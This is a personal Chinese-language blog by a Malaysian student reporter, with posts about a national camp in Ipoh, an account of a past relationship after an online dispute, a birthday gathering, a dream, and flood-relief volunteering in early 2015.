第一天因為和一些探班還不熟悉,所以晚餐(芽菜雞飯)那段時間也是悶悶的啊。不過還好探班組的嘉研還有Qi Hong 等等都有告訴我們可以參與的活動,所以真心覺得你們棒棒達~^^晚上自由時間期間,自己跳了傷心的人別聽慢歌+uptownfunkup,真的你們團康很厲害啊,我聽一次就喜歡你們的團康組,因為你們真的帶動氣氛的能力都很好啊,而那時候負責舞台燈光和音響的學記也給我見識到你們的厲害。很Rock x 1000000000000000000!!!!!!!!!!!!!!!!!!!!!!!!!!
之後營員自由時間,我自己跑去挑戰學記記錄,那個單腳跳放水瓶的遊戲,我最好的記錄就只有39秒好不甘願!目標可是35秒 啊>.<
那個Cafe 總是人潮滿滿沒去到 TT
繞了一圈去看看各區的佈置,發現雪隆區的佈置不見了?心裡頓時覺得好奇怪,還是雪隆區不需要佈置?就去門口看看結果還是沒有,一直到了半夜1點才知道雪隆區因為巴士遲了,那時候雪隆區的學弟妹也還在洗澡等等所有還沒來到禮堂他們,過後,我也只好鼓勵他們在不影響霹靂區全國營工委準備開幕彩排趕快在3點完成所有的佈置。期間也認識了不少的29屆學弟妹,也遇到自己中學的學妹才感覺得到,就算在外面,只要提到母校終會有種很懷念中華的心情^^之後還是趕完他們去睡覺,自己才放心去睡覺。第二天早餐是蛋撻^^
和東海岸的在學校對面的等巴士,第一次巴士來的時候,有幾個好像不懂吃錯什麼藥拼命對巴士招手,可是巴士沒停下因為真的是人太多了,順便提提,我學會了愛的古啊莫,科科超爽的。
圖:很美味的蛋撻^0^
來到Ipoh Parade 只為了找午餐,真是的哈哈。我那天的午餐是排骨王飯^^
接著就是危險發生的時刻了,忽然間我轉頭一看,看見那個平時Steamboot 的煤氣小罐著火了,而身邊就有一個嬰兒坐在嬰兒椅子上。只有雯順記得上前把小孩抱走再直接把話滅掉,整個過程十分短,大家還來不及反應,孩子就被救了下來了。 再一次為英勇的他鼓掌吧。^^
2點50分的電影San Andreas,要等好久啊, 又是到處亂亂逛啊,我們連大眾書局都不放過嘿嘿。沒錢買書的我真可憐 :P 因為要留到明天和後天繼續用。在戲院的流動廣告版,葉子一直很期待破風電影廣告的出現,可是還是白等了,大家也因為這個笑話一直笑她哈哈。最好笑的是連續出現2次在不同的流動廣告版,但依然MISS掉了。在看電影前,幸運的去了李小龍的畫展,那邊展出的作品水準還真高,有些畫讓我很喜歡,原諒我這裡沒有拍到照片啊。
這部電影其實是我預料之外會去觀賞的,不過就如別人說所的一樣開場到結束都很緊張刺激。和地震有關的一部電影也覺得就算不會遇上地震,但也起碼都要懂得一些地震該有的避難知識,因為說不上哪一天也可以派上用場。
在回去之前去了附近的糖水街吃了很不錯的Ice Kacang,坦白說一個人吃是真的吃不完的啊。
之後本來想走去別的地方看看的,結果走著走著就走到了怡保大草場,也沒關係啦,期間發覺到每個人過馬路都有不一樣的風格呢,在多一下子就很順利的上到巴士回到學校了。
一進校門見到了身穿去年飢餓30衣服而且又是十分熟悉的背影。第一感覺就是知道會遇見誰了。心裡也不知道為什麼很害怕的見到這一幕。直接放慢腳步讓全部東海岸的學記走前去,而我自己也乘著這個機會繞草場那邊回到探班宿舍,因為情緒還是不穩定,所以為了給自己冷靜下來就在樓上休息。結論:後來見到也沒有什麼事情了,反正就是沒有在乎什麼了。
這裡要插入一件小事情
7區展覽時候,有口福吃了叉燒包啦啦啦拉。其實本身很喜歡霹靂區弄得凱莉城堡。這裡代表雪隆區感謝有購買學情記憶的探班/營員,其實比較想感謝東海岸的學記來光顧他們哈哈。
過後遇上了雪隆區26屆蘋果學弟(政陽)和垠仲還有28屆的YC,我們都等著Yi Zhuang 學妹的到來,後來大家都在聊天旋空還有一些我還不知道的故事,不過都是聽了就算的哈哈。期間眼角偶然出現應該曾經認識的人,但依然零交流,或許我還是需要很長很長的時間去釋懷那一件事情。
時間很快轉移到全國營最精彩的一天
早上,很早就醒來了,走到樓下看到營員們都準備乘搭Perak Transit 到舊街場走走。而我也不落人後,和自己區的學弟學妹去完了怡保舊街場和新街場的壁畫。最開心的還是在南香哪裡吃了很豐富的早餐,全部人平分錢才RM7.50而已很便宜。
很豐富的早餐還有白咖啡<3
享受在尋找壁畫的我們
走完後,我也很衝忙的趕到了怡保火車站,火車站前都是學記,又是難得一見的人山人海學記版。雖然站在後面拍大合照但是也是最最最最難的在全國營的一張合照因為是和全部營員,工委,其他探班等的大合照。
那天的晚餐是Maggie Goreng,是和東海岸的學記在學校後面的餐館吃的。走著去還有等著晚餐的時間他們竟然講18++的東西哈哈哈哈,不過真的太好笑了:p 什麼鬼成千上萬次的經驗,你很神啊!!科科^^
那個員工也是太可愛了,是把單麵改成Double不是叫你另外煮過,結果來了17碗面=-=||
男生之後要吃完多出來的分>.< 可憐自己吃不完第2碗。
原始部落之夜開始啦,很可惜前面的部分自己錯過了TVT,因為臨時發生突發狀況,馬六甲學記臨時找我借電腦把表演歌曲拷貝進隨身碟裡面。不過那時候自己跑回宿舍結果流汗了TVT。
個人很喜歡東海岸的手語表演,還有團康組+其他區很盡心盡力的再一次以不間斷的方式把場面都炒熱起來。搭著肩膀走可是很傳統啊,而當熟悉的歌曲想起時候,又會想到以前的全國營/別區探班時候有跳過的團康舞。自己還有機會跑上台一整子啦啦啦拉。自己和雪隆區&東海岸的探班/營員,那時候還真的很享受的跑到很前面去哈哈。
當霹靂區27屆唱著海闊天空時候,真的很感觸,因為這首歌對他們來說有著很多的回憶,因為上次30週年晚宴時候也是有著一首歌出現,印象也特別深刻。這時候我是坐在地上的,忽然我肩膀多了一直手,往旁邊一看,原來是東海岸的營員啊,結果大家就一起跟著營員唱起歌來,那時候還不知道她的名字。
還有霹靂區個人獨舞秀也超帥的。
最好一天天,很感謝馬六甲的探班請吃的蛋撻,謝謝啦。而我的早餐也因此有著落了。自己去食堂拿了早餐,見到營員紛紛都去買Oreo巧克力冰,自己也買了一杯來試試吃著的時候,秀君學妹來了,聊了一陣子還吃了一點我還沒開始吃的早餐,吃不飽跟食堂拿啊啊@@。就問為什麼那麼得空去認識那麼多探班,答案竟然是跟我說全國營不好玩???>.< 我當下覺得納悶,沒有理由啊。再問清楚原來她以前有去過全國營,所以才和我說當探班其實比較好那樣咯。
P.s:
回家前1個小時半,自己忽然想到寫感言給29屆的學弟學妹看。
現在在寫出來就是重複寫第三次了。我很懶惰啊
重點:
1.珍惜全國營給你們的回憶
2.不要玩到自己累到,無法應付寶貝營
3.把100%微笑和動力帶給會遇到的小孩子營員們
4.做好28屆的吩咐,不要給他們那麼PekChek 你們啊^^
就這麼多吧 By B24059
(我有去看你們準備營會啊,只是一整子,還是赴約了哦)
也因為這個全國營認識了你們一部分人啊,培訓營還是可以看到我回來的啊。
我記得名字的有Shao Hong, Adrian Lim,Yu An, 菜紳士其他的以後還有機會被我記得的啊
很不捨得離開營地,不過還是要啟程回家,還好等到巴士,嚇到我以為來不及上火車,之後還要拖著重重的行李走去火車站哈哈哈
乘搭火車ETS回家的時候才發覺火車上有插座的。巧合是森州學記就坐我後面那一排而已,也不知道是他們去換票還是那麼巧啊。
Saturday, March 21, 2015
交代來龍去脈
為了避免有人生氣還是誤會的情況發生,沒有冷靜下來的就不要看哦^^
首先,我講最後一次我沒有自欺欺人
不懂5年前的事情的你請不要加以評論。不過,要感激darren gan那麼勇敢的來批評我,給我有了自信去承認該承認的,否認不對的事情。
我先承認我comment 害到人是我不對,但這是無意的,並不是我在自欺欺人。
Zi Yu,我和薇是在馬六甲全國營之後曾經在一起是事實。
任你們怎麼說事實就是不會改變。
如果要懂自己看了我寫的在自行判斷
我不想做任何的爭辯,但是我要把事情交代得清清楚楚。
1. 對不起,你的確是我最愛過的一個人,所以這樣寫沒有錯。
2. 但也因為這樣,我並不知道,這樣寫會把你害慘,不然我也不會和你道歉,再次深感抱歉。
3.生氣歸生氣,請不要過於情緒化的罵我腦殘,這一點你是否選擇道歉我無所謂。
4.叫我不要刪任何一個comment, 好,我沒有刪除掉,結果,不到3分鐘,我忘記把寫完的證據拍下來就被你刪除了,這我也當作沒有看到吧。也是你刪掉啊,愛刪掉是你自由。甚至動用到把我好友刪掉來要求我停止, 是的,我向你妥協了。我從來都沒有要求過你原諒我什麼,只是這一次,希望你是真的懂我的用意,我不希望看到誤會繼續下去,也影響我們之間的友情,我相信,你也不會這麼做的吧。
而這篇回憶錄是紀念美好的點點滴滴而已,不是炫耀什麼,我寫著的時候都很感激當年有一個這麼好的你陪我走過一段日子。^^ 只想你早日消氣,加油加油!願你的未來還是可以隨著自己喜歡的夢想繼續前進吧Xd。沒有當年對我用心做過的一切,也不會成就今天思想上成熟了不少的禎寧。
5.套用你的一句話,爭辯起來一點都不光彩,但我還是有底線和尊嚴的,就希望你生氣我的時候也講會比較理智的話,謝謝。而我也不希望有人用誤會的眼光繼續看待我下去,這點對你對我尤其重要,希望你也能體諒。
6. 這一點開始都是5年前的事情,我會清清楚楚把知道的寫出來多。回憶總是多麼的美好。
a) 2011年,你獨自一個乘搭巴士下來KL參加我們25屆舉辦的音樂營,我非常感動,當然這其中一個原因也是因為你是我的女朋友吧。
b) 到了巴士站,是我一個人把你接到營地,在那之前你一見到我就挽起我的手臂(注意我沒有使用牽手的字眼),然後陪了你去買回程的巴士票,也耐心的等待你做一些事情。
c) 不好意思,平時不會迷路的我卻牽著你的時候,忽然間找不到要吃晚餐的那件店的路,之後去了CM的MCD解決了我們的晚餐。
d)當時後你還說想念你到忘記了路怎樣走哈哈
e)搭RapidKL去着營地的時候你還試過靠著我的肩膀一下子那麼多啦>.<
f)到了營地,我和你就在一個很多蚊子的地方一直聊天,期間,我有離開過幾次去看學弟妹的會議。
g)因為你提早進營,那一晚抱歉讓你自己一個人睡在道具室,沒陪到你,當時候的我也沒有那份勇氣啊。
f)戀愛達人的舞蹈, 我沒有像現在那樣會跳一些國際舞了哈哈
g)蒙著眼睛早上的遊戲跑站,其實我有在你附近看著你的,而且很接近,只是一直以來都沒讓你知道而已哦。
h) 最後一天的時候,外面吃東西的時候,你不給我拍你照片記得嗎=)可是我心裡好想說,你這麼漂亮,我當然是想把你的倩影拍下來當作留戀啊。
i)道別時你親吻我的臉頰,害我反應不過來+加努力看懂你畫在玻璃上的手語。馬上就很捨不得的打給你聊了20分鐘左右。
j) 聖誕節見面會前一天,你來不到,我自己一個人在Gurney Plaza 樓上唱K了3-4個小時。這是我人生中第一次自己一個唱K,也好想快點見到你。
k) 第二天,買了戲票,苦苦等待當時候的我一直擔心你來不到啊,但是見到你比什麼事情都來得還要重要,那時候你依然不肯原諒我和別人放假關係的事情,讓你委屈了,所以那天就沒有牽過我的手。
j)謝謝你送給我的藍色心得拼圖禮物,我很用心的在回到Gurun就努力的拼起來了。喜歡你給我的這份禮物,那天的午餐是在KimGary餐廳享用吧。
j)搭德士去碼頭,船上爭取時間和你聊了蠻多,但我也不大記得了,哈哈就不寫啦。
k)又是分道揚鑣的時候,這我也沒想到是我們情侶最後一次見面,因為我們以後也沒有料到會發生怎麼樣的事情。而我也趕著和家人回合回去Gurun了。
l)分手當日,是寶貝營其中一天,當時的我也是難過得的流下淚來,結果為了平復情緒就搭巴士打算去國家銀行參觀錢幣等等,還沒到之前我還在巴士和你聊著電話但是我也是在巴士靜靜地哭了。(巴士只有我還有司機,所以就還好)
這美好的回憶就這樣的寫上休止符吧 ,還有那段對詩歌的回憶也不寫了,知道的人自然會知道啦。
首先,我講最後一次我沒有自欺欺人
不懂5年前的事情的你請不要加以評論。不過,要感激darren gan那麼勇敢的來批評我,給我有了自信去承認該承認的,否認不對的事情。
我先承認我comment 害到人是我不對,但這是無意的,並不是我在自欺欺人。
Zi Yu,我和薇是在馬六甲全國營之後曾經在一起是事實。
任你們怎麼說事實就是不會改變。
如果要懂自己看了我寫的在自行判斷
我不想做任何的爭辯,但是我要把事情交代得清清楚楚。
1. 對不起,你的確是我最愛過的一個人,所以這樣寫沒有錯。
2. 但也因為這樣,我並不知道,這樣寫會把你害慘,不然我也不會和你道歉,再次深感抱歉。
3.生氣歸生氣,請不要過於情緒化的罵我腦殘,這一點你是否選擇道歉我無所謂。
4.叫我不要刪任何一個comment, 好,我沒有刪除掉,結果,不到3分鐘,我忘記把寫完的證據拍下來就被你刪除了,這我也當作沒有看到吧。也是你刪掉啊,愛刪掉是你自由。甚至動用到把我好友刪掉來要求我停止, 是的,我向你妥協了。我從來都沒有要求過你原諒我什麼,只是這一次,希望你是真的懂我的用意,我不希望看到誤會繼續下去,也影響我們之間的友情,我相信,你也不會這麼做的吧。
而這篇回憶錄是紀念美好的點點滴滴而已,不是炫耀什麼,我寫著的時候都很感激當年有一個這麼好的你陪我走過一段日子。^^ 只想你早日消氣,加油加油!願你的未來還是可以隨著自己喜歡的夢想繼續前進吧Xd。沒有當年對我用心做過的一切,也不會成就今天思想上成熟了不少的禎寧。
5.套用你的一句話,爭辯起來一點都不光彩,但我還是有底線和尊嚴的,就希望你生氣我的時候也講會比較理智的話,謝謝。而我也不希望有人用誤會的眼光繼續看待我下去,這點對你對我尤其重要,希望你也能體諒。
6. 這一點開始都是5年前的事情,我會清清楚楚把知道的寫出來多。回憶總是多麼的美好。
a) 2011年,你獨自一個乘搭巴士下來KL參加我們25屆舉辦的音樂營,我非常感動,當然這其中一個原因也是因為你是我的女朋友吧。
b) 到了巴士站,是我一個人把你接到營地,在那之前你一見到我就挽起我的手臂(注意我沒有使用牽手的字眼),然後陪了你去買回程的巴士票,也耐心的等待你做一些事情。
c) 不好意思,平時不會迷路的我卻牽著你的時候,忽然間找不到要吃晚餐的那件店的路,之後去了CM的MCD解決了我們的晚餐。
d)當時後你還說想念你到忘記了路怎樣走哈哈
e)搭RapidKL去着營地的時候你還試過靠著我的肩膀一下子那麼多啦>.<
f)到了營地,我和你就在一個很多蚊子的地方一直聊天,期間,我有離開過幾次去看學弟妹的會議。
g)因為你提早進營,那一晚抱歉讓你自己一個人睡在道具室,沒陪到你,當時候的我也沒有那份勇氣啊。
f)戀愛達人的舞蹈, 我沒有像現在那樣會跳一些國際舞了哈哈
g)蒙著眼睛早上的遊戲跑站,其實我有在你附近看著你的,而且很接近,只是一直以來都沒讓你知道而已哦。
h) 最後一天的時候,外面吃東西的時候,你不給我拍你照片記得嗎=)可是我心裡好想說,你這麼漂亮,我當然是想把你的倩影拍下來當作留戀啊。
i)道別時你親吻我的臉頰,害我反應不過來+加努力看懂你畫在玻璃上的手語。馬上就很捨不得的打給你聊了20分鐘左右。
j) 聖誕節見面會前一天,你來不到,我自己一個人在Gurney Plaza 樓上唱K了3-4個小時。這是我人生中第一次自己一個唱K,也好想快點見到你。
k) 第二天,買了戲票,苦苦等待當時候的我一直擔心你來不到啊,但是見到你比什麼事情都來得還要重要,那時候你依然不肯原諒我和別人放假關係的事情,讓你委屈了,所以那天就沒有牽過我的手。
j)謝謝你送給我的藍色心得拼圖禮物,我很用心的在回到Gurun就努力的拼起來了。喜歡你給我的這份禮物,那天的午餐是在KimGary餐廳享用吧。
j)搭德士去碼頭,船上爭取時間和你聊了蠻多,但我也不大記得了,哈哈就不寫啦。
k)又是分道揚鑣的時候,這我也沒想到是我們情侶最後一次見面,因為我們以後也沒有料到會發生怎麼樣的事情。而我也趕著和家人回合回去Gurun了。
l)分手當日,是寶貝營其中一天,當時的我也是難過得的流下淚來,結果為了平復情緒就搭巴士打算去國家銀行參觀錢幣等等,還沒到之前我還在巴士和你聊著電話但是我也是在巴士靜靜地哭了。(巴士只有我還有司機,所以就還好)
這美好的回憶就這樣的寫上休止符吧 ,還有那段對詩歌的回憶也不寫了,知道的人自然會知道啦。
Sunday, January 18, 2015
低調的21歲&2015甲洞區聚會&守護之心
沒有熱烈的慶祝,當作是個對自己反思的機會。過了多少個日夜,自己掉下的眼淚都把我變得狼狽。
今年的生日第一個祝福我的你,非常感謝那麼多人是你第一個想起我的生日,還等到12點的時候,信息給我,收到之後我的心情是很平靜的加開心,沒辦法有些人就是簡單的言語都可以馬上把不是很開心的自己一下子從不開心變去連微笑是從心裡自然的流露出來 嘻嘻<3
忙到沒有的慶祝也是預料之事。謝謝那個新的鉛筆袋還有那條巧克力 非常的甜 <3
留在家裡的我一一的為祝福我的朋友致謝也是個我做出感激的事情吧。
以下我列出的都是在我生命中不可缺少的朋友和學記,沒有你們也不會繼續成長和進步的自己【此名單是For 感寫生日祝福的,因為要列出我生命中的是在是太多啦,我怕會遺漏啊@@】
學記:
1.雪隆區:24的同屆:23的學哥學姐,和我同一天生日的24/25屆學記,25+26+27+28+29的所有有寫生日祝福給我的學弟妹(真的我都有一一回复你們啦)
2.東海岸區:YokeYan
3.檳吉玻北霹靂:家勇,艷雯
4.霹靂區的運聯高級學記,29的佳樂,還有27的美婷的SMS祝福+30屆的維珊^^
5森州學記;樂兒,ZhenLo
6.柔佛區:選光學弟
朋友:
馬來西亞+法國的朋友
還有謝謝中華的老師^0^
特別感謝Yih Woei,苑妮,Milly,Kenneth Cheng 和Kim Ling在我練習為我獻上祝福
還有還有一直講要見面都見不到的Gabriella(歡歡),一旦有機會我就會來找你的啦,謝謝你送給我那張你自己那麼可愛的自拍照喲,你還給你妹妹笑你,難為啊。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~·
1年啦(因為去年有聚會的意思),甲洞區24的學記者再一次的聚在一起,今年大家彷彿都來了Kik 還竟然是3站的聚會,完全就是意想不到吧
我第一次最早到聚會地點XDD 之後她們都來啦,唯獨Seng Yi 和學哥還沒到TVT ,當他們到了的時候我們都差不多打算去吃火鍋^^
火鍋的時候,大家都好像都很愛吃菜那樣Xd。雖然那個火鍋味道還好,不過我還很享受一起吃火鍋的感覺呢。那個TomYam湯底很辣,但我還是接受得到啦。^^
3個男生到最後好像是吃最多的xp
子君家,Jinny小貓成為了當晚的主角,很多貓的話題都出來啦。
謝謝依盈從日本和澳洲帶回來的收信,巧克力好吃啊~
子君&啟豪的互相酸人的功力好強啊,小弟甘拜下風了嘿嘿,真的好笑啊那些笑話XD
我,Seng Yi and 子君 第一次一起慶祝生日哇啊啊,這次是我人生中第一次咬蠟燭,感覺就是我吃到了一點點蠟燭的,救命啊!
許下了以後每年都希望可以和大家聚會一次+祝福大家天天都開心啊。
還會再Update
今年的生日第一個祝福我的你,非常感謝那麼多人是你第一個想起我的生日,還等到12點的時候,信息給我,收到之後我的心情是很平靜的加開心,沒辦法有些人就是簡單的言語都可以馬上把不是很開心的自己一下子從不開心變去連微笑是從心裡自然的流露出來 嘻嘻<3
忙到沒有的慶祝也是預料之事。謝謝那個新的鉛筆袋還有那條巧克力 非常的甜 <3
留在家裡的我一一的為祝福我的朋友致謝也是個我做出感激的事情吧。
以下我列出的都是在我生命中不可缺少的朋友和學記,沒有你們也不會繼續成長和進步的自己【此名單是For 感寫生日祝福的,因為要列出我生命中的是在是太多啦,我怕會遺漏啊@@】
學記:
1.雪隆區:24的同屆:23的學哥學姐,和我同一天生日的24/25屆學記,25+26+27+28+29的所有有寫生日祝福給我的學弟妹(真的我都有一一回复你們啦)
2.東海岸區:YokeYan
3.檳吉玻北霹靂:家勇,艷雯
4.霹靂區的運聯高級學記,29的佳樂,還有27的美婷的SMS祝福+30屆的維珊^^
5森州學記;樂兒,ZhenLo
6.柔佛區:選光學弟
朋友:
馬來西亞+法國的朋友
還有謝謝中華的老師^0^
特別感謝Yih Woei,苑妮,Milly,Kenneth Cheng 和Kim Ling在我練習為我獻上祝福
還有還有一直講要見面都見不到的Gabriella(歡歡),一旦有機會我就會來找你的啦,謝謝你送給我那張你自己那麼可愛的自拍照喲,你還給你妹妹笑你,難為啊。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~·
1年啦(因為去年有聚會的意思),甲洞區24的學記者再一次的聚在一起,今年大家彷彿都來了Kik 還竟然是3站的聚會,完全就是意想不到吧
我第一次最早到聚會地點XDD 之後她們都來啦,唯獨Seng Yi 和學哥還沒到TVT ,當他們到了的時候我們都差不多打算去吃火鍋^^
火鍋的時候,大家都好像都很愛吃菜那樣Xd。雖然那個火鍋味道還好,不過我還很享受一起吃火鍋的感覺呢。那個TomYam湯底很辣,但我還是接受得到啦。^^
3個男生到最後好像是吃最多的xp
子君家,Jinny小貓成為了當晚的主角,很多貓的話題都出來啦。
謝謝依盈從日本和澳洲帶回來的收信,巧克力好吃啊~
子君&啟豪的互相酸人的功力好強啊,小弟甘拜下風了嘿嘿,真的好笑啊那些笑話XD
我,Seng Yi and 子君 第一次一起慶祝生日哇啊啊,這次是我人生中第一次咬蠟燭,感覺就是我吃到了一點點蠟燭的,救命啊!
許下了以後每年都希望可以和大家聚會一次+祝福大家天天都開心啊。
還會再Update
Tuesday, January 6, 2015
趕不上的火車
你昨天有看我部落格吧,今天分享一個很夢幻的夢境(不準笑我)
接下來寫的都是我剛才所發生的夢境。
在這個夢境裡我來到了一個還很先進的火車站,有點像在未來那種很有型的火車站。
接著有5輛帥氣的火車進站了,等等這5輛火車很像列車戰隊的彩虹線啊。再認真看下其實這五輛火車並不是彩虹線,而他們也各具不一樣的特色。而我後來登上的紅色有點LionKing feel 的火車,奇怪,戰隊 裡面紅戰士也是乘搭紅色的火車,當然我不是成了紅戰士啦。在這裡我就稱呼那一列火車叫紅獅號吧^^
在上火車前,要檢查火車票,可是找完自己的行李也找不到票,處理好的時候火車的門竟然關上了,我馬上要裡面的人叫車长停車,也很巧合的奏效了Xd。而且還啟用了緊急剎車按鈕。
上火車那一刻,我是在另一個車站上車,這完全就是個不合邏輯的東西嘛>.<。由於是臨時處理出來的票,所以上到火車我是站着的。火車上也是有一些人站著的,然後見到一個女生也是站著,我就好奇,特快不是都有很舒適的座位嗎怎麼還站著?那個女的樣子也很熟悉只不過不知道名字,在夢裡我也沒問,但是是穿著獨中的校服不是母校,好像是怡保的可是怡保也沒有那間獨中啊@@。好詭異的說,我特別想要提一提站著的原因,是因為買月票的關係只需要100元,就可以無限次乘搭這一輛列車。也是想省錢的關係吧,可是都站著啊,我問她不累嗎,而且距離這麼遠,可是她說也沒有很累因為看著沿途的風景就可以忘記掉站着的累。
我也是對著她微笑地點頭了,不久來到了海底~~~~~~~~~一千個問號
Nani 為什麼是海底為什麼是海底為什麼海底
可是感覺就像是在水族館裡面看魚那樣 很美的風景!
很多魚都很漂亮啦 又有人陪我看 真是幸福洋溢xp
很少人可以和我有說有笑吧 漸漸的也醒來了 :P
現實中給我快點遇見你啦^^ #生日還有12天
接下來寫的都是我剛才所發生的夢境。
在這個夢境裡我來到了一個還很先進的火車站,有點像在未來那種很有型的火車站。
接著有5輛帥氣的火車進站了,等等這5輛火車很像列車戰隊的彩虹線啊。再認真看下其實這五輛火車並不是彩虹線,而他們也各具不一樣的特色。而我後來登上的紅色有點LionKing feel 的火車,奇怪,戰隊 裡面紅戰士也是乘搭紅色的火車,當然我不是成了紅戰士啦。在這裡我就稱呼那一列火車叫紅獅號吧^^
在上火車前,要檢查火車票,可是找完自己的行李也找不到票,處理好的時候火車的門竟然關上了,我馬上要裡面的人叫車长停車,也很巧合的奏效了Xd。而且還啟用了緊急剎車按鈕。
上火車那一刻,我是在另一個車站上車,這完全就是個不合邏輯的東西嘛>.<。由於是臨時處理出來的票,所以上到火車我是站着的。火車上也是有一些人站著的,然後見到一個女生也是站著,我就好奇,特快不是都有很舒適的座位嗎怎麼還站著?那個女的樣子也很熟悉只不過不知道名字,在夢裡我也沒問,但是是穿著獨中的校服不是母校,好像是怡保的可是怡保也沒有那間獨中啊@@。好詭異的說,我特別想要提一提站著的原因,是因為買月票的關係只需要100元,就可以無限次乘搭這一輛列車。也是想省錢的關係吧,可是都站著啊,我問她不累嗎,而且距離這麼遠,可是她說也沒有很累因為看著沿途的風景就可以忘記掉站着的累。
我也是對著她微笑地點頭了,不久來到了海底~~~~~~~~~一千個問號
Nani 為什麼是海底為什麼是海底為什麼海底
可是感覺就像是在水族館裡面看魚那樣 很美的風景!
很多魚都很漂亮啦 又有人陪我看 真是幸福洋溢xp
很少人可以和我有說有笑吧 漸漸的也醒來了 :P
現實中給我快點遇見你啦^^ #生日還有12天
Sunday, January 4, 2015
不一樣的倒數
去年的確發生了很多很多件不愉快的事情,不只是我很多人都失去了某些重要的事物。
2014年12月聖誕節期間,我國發生了有史以來最嚴重的水災,而我雖不是受害者,但我卻明白只要自己有一份力,就該做出行動。恰好報館需要學記去幫忙,我就選擇了在最後一天參與了希望2015的跨年倒數活動。我和一群學記以及有心人士在那晚忙個不停,大家齊心合力的處理好捐助品,只要有物資源來,都會很醒目的去開始做東西。感謝送來物資的善心人士,你們每一個人的愛心都會傳達到災民的心理的。
題外話:第一次站在台上和歌手一起倒數和唱國歌^-^ 不過那感覺就是不知不覺到了2015年1月1日我也不知道。
還以今年不再為某個人留下不值得的眼淚了Tim,可是剛剛跑去看上幾篇Blog眼淚馬上掉了,講好不再傷心了嗎,我還是矛盾到極點呢,更好笑的是我哭到很厲害。情緒就在那麼一瞬間再度崩潰,瓦解的真不是時候。想想還好啊,因為一下子又恢復了。總結來說我的回复能力還很強下的呢。
(好丟臉)OK Stop 寫短短就夠了,還好沒有人看到,不然我一定沒眼見人啦。
21歲的生日要到了啊,不過今年沒有特別想慶祝意願,有人肯願意寫長長的信息給我就很開心啦,如果我試試看不提起看會不會有人記得呢。^0^
2014年12月聖誕節期間,我國發生了有史以來最嚴重的水災,而我雖不是受害者,但我卻明白只要自己有一份力,就該做出行動。恰好報館需要學記去幫忙,我就選擇了在最後一天參與了希望2015的跨年倒數活動。我和一群學記以及有心人士在那晚忙個不停,大家齊心合力的處理好捐助品,只要有物資源來,都會很醒目的去開始做東西。感謝送來物資的善心人士,你們每一個人的愛心都會傳達到災民的心理的。
題外話:第一次站在台上和歌手一起倒數和唱國歌^-^ 不過那感覺就是不知不覺到了2015年1月1日我也不知道。
還以今年不再為某個人留下不值得的眼淚了Tim,可是剛剛跑去看上幾篇Blog眼淚馬上掉了,講好不再傷心了嗎,我還是矛盾到極點呢,更好笑的是我哭到很厲害。情緒就在那麼一瞬間再度崩潰,瓦解的真不是時候。想想還好啊,因為一下子又恢復了。總結來說我的回复能力還很強下的呢。
(好丟臉)OK Stop 寫短短就夠了,還好沒有人看到,不然我一定沒眼見人啦。
21歲的生日要到了啊,不過今年沒有特別想慶祝意願,有人肯願意寫長長的信息給我就很開心啦,如果我試試看不提起看會不會有人記得呢。^0^
Subscribe to:
Posts (Atom)